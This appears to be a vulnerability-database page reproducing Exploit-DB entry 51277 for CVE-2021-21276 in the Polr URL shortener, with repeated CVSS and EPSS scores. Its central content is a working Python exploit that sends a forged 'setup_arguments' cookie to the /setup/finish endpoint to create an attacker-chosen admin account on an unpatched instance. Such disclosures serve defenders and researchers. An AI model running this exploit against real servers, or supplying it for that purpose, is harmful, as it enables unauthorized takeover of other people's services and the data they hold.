Lucene search

P4kl0nc4tEDB-ID:51277

HistoryApr 06, 2023 - 12:00 a.m.

POLR URL 2.3.0 - Shortener Admin Takeover

2023-04-0600:00:00

p4kl0nc4t

www.exploit-db.com

110

polr url 2.3.0

shortener admin takeover

exploit title

exploit author

vendor homepage

software link

version

tested on

cve-2021-21276

linux

setup auth key

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

9.3 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

9.5 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

87.1%

JSON

# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
    'acct_username': 'admin',
    'acct_password': 'password',
    'acct_email': '[email protected]',
    'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
                 cookies={'setup_arguments': json.dumps(payload)})
print(r.text)

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

9.3 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

9.5 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

87.1%

JSON

Related for EDB-ID:51277